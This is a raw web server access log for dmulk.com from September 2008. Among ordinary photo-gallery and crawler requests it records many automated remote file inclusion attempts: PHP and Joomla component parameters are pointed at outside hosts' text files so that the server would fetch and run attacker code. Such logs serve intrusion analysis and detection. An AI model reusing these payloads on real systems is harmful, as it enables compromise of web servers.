72.199.235.196 - - [20/Sep/2008:10:23:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-047_1.jpg HTTP/1.1" 200 386939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.9.247.34 - - [20/Sep/2008:10:23:47 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:23:48 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0121.jpg HTTP/1.1" 200 373247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:24:01 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:24:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034_1.jpg HTTP/1.1" 200 270750 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:24:02 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92716 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.247.34 - - [20/Sep/2008:10:24:03 -0700] "GET //common/db.php?commonpath=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:24:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-258.jpg HTTP/1.1" 200 498359 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
67.15.192.17 - - [20/Sep/2008:10:24:17 -0700] "GET /logs/access_080518.log//ashnews.php?pathtoashnews=http://nawaoh.t35.com/cd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.192.17 - - [20/Sep/2008:10:24:18 -0700] "GET //ashnews.php?pathtoashnews=http://nawaoh.t35.com/cd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.192.17 - - [20/Sep/2008:10:24:18 -0700] "GET /logs//ashnews.php?pathtoashnews=http://nawaoh.t35.com/cd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.192.17 - - [20/Sep/2008:10:24:21 -0700] "GET /logs/access_080508.log//ashnews.php?pathtoashnews=http://nawaoh.t35.com/cd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:24:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-119_0.jpg HTTP/1.1" 200 444844 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:24:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-222.jpg HTTP/1.1" 200 491796 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:10:24:43 -0700] "GET /logs/access_080330.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.231.24.53 - - [20/Sep/2008:10:24:54 -0700] "GET /logs/access_080416.log%20//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:24:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0023.jpg HTTP/1.1" 200 503948 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:25:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-035_0.jpg HTTP/1.1" 200 276707 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:10:25:10 -0700] "GET /logs/access_070830.log HTTP/1.0" 200 30370 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:25:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-043_1.jpg HTTP/1.1" 200 383309 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:25:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-010_2.jpg HTTP/1.1" 200 426988 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:25:52 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:25:53 -0700] "GET /logs/access_080903.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:25:59 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:25:59 -0700] "GET /logs/access_080903.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:26:02 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-040_3.jpg HTTP/1.1" 200 307627 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
195.114.29.130 - - [20/Sep/2008:10:26:13 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92690 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:26:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-016_4.jpg HTTP/1.1" 200 340919 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:26:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0144.jpg HTTP/1.1" 200 316667 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:26:43 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0038.jpg HTTP/1.1" 200 500121 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
77.79.245.90 - - [20/Sep/2008:10:26:48 -0700] "GET /logs/access_080829.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.245.90 - - [20/Sep/2008:10:26:48 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.245.90 - - [20/Sep/2008:10:26:48 -0700] "GET /logs//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:26:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-082.jpg HTTP/1.1" 200 430958 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:27:09 -0700] "GET /logs/access_080508.log//ashnews.php?pathtoashnews=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:27:10 -0700] "GET /logs//ashnews.php?pathtoashnews=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:27:10 -0700] "GET /logs/access_080518.log//ashnews.php?pathtoashnews=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:27:10 -0700] "GET //ashnews.php?pathtoashnews=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:27:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-201.jpg HTTP/1.1" 200 380781 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:27:12 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:27:13 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92671 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.24.32 - - [20/Sep/2008:10:27:13 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [20/Sep/2008:10:27:13 -0700] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [20/Sep/2008:10:27:13 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [20/Sep/2008:10:27:13 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:27:17 -0700] "GET /logs/access_080723.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:27:17 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:27:17 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:27:18 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:27:21 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:27:21 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:27:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-007_0.jpg HTTP/1.1" 200 692016 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:27:27 -0700] "GET /logs/access_080904.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:27:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-138_1.jpg HTTP/1.1" 200 344720 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:27:52 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-087_0.jpg HTTP/1.1" 200 272096 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:27:57 -0700] "GET /logs/access_080709.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:27:58 -0700] "GET /logs/access_080901.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:27:59 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92681 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:27:59 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:28:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-191.jpg HTTP/1.1" 200 277180 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:28:08 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [20/Sep/2008:10:28:10 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [20/Sep/2008:10:28:10 -0700] "GET /logs/access_080723.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:28:10 -0700] "GET /logs/access_080904.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [20/Sep/2008:10:28:10 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:28:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-050_3.jpg HTTP/1.1" 200 448201 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
91.121.4.30 - - [20/Sep/2008:10:28:22 -0700] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:28:35 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1004.jpg HTTP/1.1" 200 260222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:28:37 -0700] "GET /logs/access_080902.log/index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:28:38 -0700] "GET /logs/access_080902.log/index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:28:39 -0700] "GET /logs/access_080702.log//phpSecurePages/secure.php?&cfgProgDir=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:28:40 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:28:40 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:28:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-257.jpg HTTP/1.1" 200 565418 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
219.85.63.226 - - [20/Sep/2008:10:28:51 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://adrenalintravel.ru/images/products/thumbs/comberan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [20/Sep/2008:10:28:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://adrenalintravel.ru/images/products/thumbs/comberan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [20/Sep/2008:10:28:51 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://adrenalintravel.ru/images/products/thumbs/comberan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.11.14.244 - - [20/Sep/2008:10:28:55 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.tribochina.com//components/com_simpleboard/giannuzzo.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
87.11.14.244 - - [20/Sep/2008:10:28:55 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.tribochina.com//components/com_simpleboard/giannuzzo.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:29:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-274.jpg HTTP/1.1" 200 312607 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:29:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-014_3.jpg HTTP/1.1" 200 495384 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
213.165.88.84 - - [20/Sep/2008:10:29:28 -0700] "GET /logs/access_080905.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.88.84 - - [20/Sep/2008:10:29:29 -0700] "GET /logs/access_080824.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:29:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-087_1.jpg HTTP/1.1" 200 408915 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
213.165.86.7 - - [20/Sep/2008:10:29:45 -0700] "GET /logs/access_080905.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [20/Sep/2008:10:29:46 -0700] "GET /logs/access_080824.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:29:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-075_0.jpg HTTP/1.1" 200 488352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.13.230.70 - - [20/Sep/2008:10:29:50 -0700] "GET /index2.php?DoAction=http://h1.ripway.com/diana22/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [20/Sep/2008:10:29:52 -0700] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://adrenalintravel.ru/images/products/thumbs/comberan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:29:59 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:29:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:30:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-076_1.jpg HTTP/1.1" 200 300603 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:30:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.176.205.147 - - [20/Sep/2008:10:30:14 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 200 92301 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.192.17 - - [20/Sep/2008:10:30:14 -0700] "GET /logs//ashnews.php?pathtoashnews=http://nawaoh.t35.com/cd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.192.17 - - [20/Sep/2008:10:30:14 -0700] "GET //ashnews.php?pathtoashnews=http://nawaoh.t35.com/cd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:30:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-118_0.jpg HTTP/1.1" 200 575940 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:30:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-160_1.jpg HTTP/1.1" 200 380159 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
91.193.20.45 - - [20/Sep/2008:10:30:34 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 200 92591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
91.193.20.45 - - [20/Sep/2008:10:30:34 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:30:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-140.jpg HTTP/1.1" 200 548515 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:30:44 -0700] "GET /logs/access_080630.log//phpSecurePages/secure.php?&cfgProgDir=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:30:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0152.jpg HTTP/1.1" 200 335197 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
206.248.167.129 - - [20/Sep/2008:10:30:59 -0700] "GET /logs/access_080723.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:31:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-093.jpg HTTP/1.1" 200 494177 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
141.44.140.111 - - [20/Sep/2008:10:31:12 -0700] "GET /logs/access_080723.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:10:31:16 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:10:31:16 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.186.1.54 - - [20/Sep/2008:10:31:26 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
